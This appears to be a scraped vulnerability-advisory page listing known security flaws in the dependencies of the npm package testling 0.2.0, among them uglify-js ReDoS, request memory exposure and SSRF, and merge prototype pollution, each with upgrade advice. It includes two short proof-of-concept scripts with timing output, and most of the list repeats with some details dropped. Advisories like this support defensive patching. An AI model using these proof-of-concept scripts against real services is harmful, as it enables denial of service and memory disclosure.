Version Details and Security Vulnerabilities

Summary:

Regular Expression Denial of Service in uglify-js

Details:

Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.

Proof of Concept

var u = require('uglify-js');
var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");

Results

$ time node test.js 10000
real	0m1.091s
user	0m1.047s
sys	0m0.039s

$ time node test.js 80000
real	0m6.486s
user	0m6.229s
sys	0m0.094s

Recommendation

Update to version 2.6.0 or later.

Details about sockjs@0.3.7

Summary:

Improper Input Validation in SocksJS-Node

Details:

Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.

Summary:

Insecure Entropy Source - Math.random() in node-uuid

Details:

Affected versions of node-uuid consistently fall back to using Math.random as an entropy source instead of crypto, which may result in guessable UUID's.

Recommendation

Update to version 1.4.4 or later.

Details about node-uuid@1.3.3

Summary:

Remote Memory Exposure in request

Details:

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
	req.on('data', function (data) {
            console.log(data)
        });
	res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
	method: "POST",
	uri: 'http://localhost:8000',
	multipart: [{body:500}]
},function(err,res,body){});

Recommendation

Update to version 2.68.0 or later

Summary:

Server-Side Request Forgery in Request

Details:

The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).

NOTE: The request package is no longer supported by the maintainer.

Summary:

Prototype Pollution in merge

Details:

All versions of package merge <2.1.1 are vulnerable to Prototype Pollution via _recursiveMerge .

Summary:

Prototype Pollution in merge

Details:

Versions of merge before 1.2.1 are vulnerable to prototype pollution. The merge.recursive function can be tricked into adding or modifying properties of the Object prototype.

Recommendation

Update to version 1.2.1 or later.

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 0.2.0 of the package testling.

All Security Vulnerabilities

All the vulnerabilities related to the version 0.2.0 of the package

Summary:

Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js

Details:

Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.

Recommendation

Upgrade UglifyJS to version >= 2.4.24.

Summary:

Regular Expression Denial of Service in uglify-js

Details:

Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.

Proof of Concept

var u = require('uglify-js');
var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");

Results

$ time node test.js 10000
real	0m1.091s
user	0m1.047s
sys	0m0.039s

$ time node test.js 80000
real	0m6.486s
user	0m6.229s
sys	0m0.094s

Recommendation

Update to version 2.6.0 or later.

Details about sockjs@0.3.7

Summary:

Improper Input Validation in SocksJS-Node

Details:

Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.

Summary:

Insecure Entropy Source - Math.random() in node-uuid

Details:

Affected versions of node-uuid consistently fall back to using Math.random as an entropy source instead of crypto, which may result in guessable UUID's.

Recommendation

Update to version 1.4.4 or later.

Details about node-uuid@1.3.3

Summary:

Remote Memory Exposure in request

Details:

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
	req.on('data', function (data) {
            console.log(data)
        });
	res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
	method: "POST",
	uri: 'http://localhost:8000',
	multipart: [{body:500}]
},function(err,res,body){});

Recommendation

Update to version 2.68.0 or later

Summary:

Server-Side Request Forgery in Request

Details:

NOTE: The request package is no longer supported by the maintainer.

Summary:

Prototype Pollution in merge

Details:

All versions of package merge <2.1.1 are vulnerable to Prototype Pollution via _recursiveMerge .

Summary:

Prototype Pollution in merge

Details:

Versions of merge before 1.2.1 are vulnerable to prototype pollution. The merge.recursive function can be tricked into adding or modifying properties of the Object prototype.

Recommendation

Update to version 1.2.1 or later.